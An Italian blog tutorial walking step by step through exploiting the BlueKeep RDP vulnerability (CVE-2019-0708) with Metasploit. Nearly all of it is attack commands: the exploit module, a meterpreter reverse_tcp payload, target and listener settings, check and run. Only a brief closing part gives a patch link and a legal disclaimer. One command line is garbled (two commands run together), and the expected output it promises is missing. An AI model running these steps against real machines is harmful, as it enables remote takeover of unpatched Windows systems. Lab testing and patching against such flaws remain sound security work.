Cari lettori di Tecnogalaxy, oggi parleremo della tecnica RDP exploit. In questo articolo vedremo step by step come sfruttare la vulnerabilità CVE_2019_0708 e come utilizzarla. Quando un server, un pc è pubblicato su internet senza le dovute sicurezze, mettiamo tutta l’intera infrastruttura in pericolo.

Come sempre utilizziamo il nostro caro amico Kali Linux!

Utilizzare tecnica RDP Exploit

Avviamo il potente Metasploit già presente in Kali Linux e scriviamo il seguente comando confermando con l’invio:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

A questo punto dobbiamo richiamare il payload:

windows/x64/meterpreter/reverse_tcpset GROOMSIZE 50

Inseriamo l’ip della macchina da testare scrivendo:

set RHOST 172.16.111.172 

Adesso dobbiamo passare il nostro ip, apriamo una shell e scriviamo il comando:

ifconfig

Copiamo il nostro ip e scriviamo il comando:

set LHOST  "il nostro ip"

Scriviamo:

set target 3

Per vedere se abbiamo inserito tutti i parametri richiesti scriviamo:

show options

Se è tutto ok, passiamo al check del nostro test scrivendo:

check

Se il nostro target sarà vulnerabile vedremo questo risultato:

Scriviamo il comando:

run

Bingo, il nostro test è andato a buon fine.

Come difendersi da questo attacco?

Aggiornare subito la propria macchina scaricando gli aggiornamento da questo link:

https://support.microsoft.com/it-it/help/4500705/customer-guidance-for-cve-2019-0708

Questa vulnerabilità colpisce i sistemi Windows 7, Windows Server 2008 R2, Windows Server 2008 e sui non più supportati Windows XP e Windows 2003.

Come sempre fatene buon uso facendo dei test su vostri devaice / computer, farli su devaice/computer non vostri è illegale.

Al prossimo articolo!

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.